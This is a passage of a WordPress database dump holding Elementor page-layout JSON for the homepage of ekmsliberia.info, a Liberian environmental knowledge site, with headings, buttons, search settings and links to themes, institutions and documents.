Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-themes\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore Documents Database\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"82036e6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"420de78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"be90f2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ab595a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"69484d6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"748843a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"980014f\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#014421\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#2df700\",\"description_color\":\"#ffffff\",\"button_background_color\":\"rgba(0,206,27,0.66)\",\"button_background_hover_color\":\"#006400\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(6041,543,'_elementor_version','2.7.5'),(6042,543,'_elementor_template_type','wp-page'),(6043,543,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(6045,544,'_wp_page_template','default'),(6046,544,'_elementor_edit_mode','builder'),(6047,544,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-themes\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore Documents Database\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas 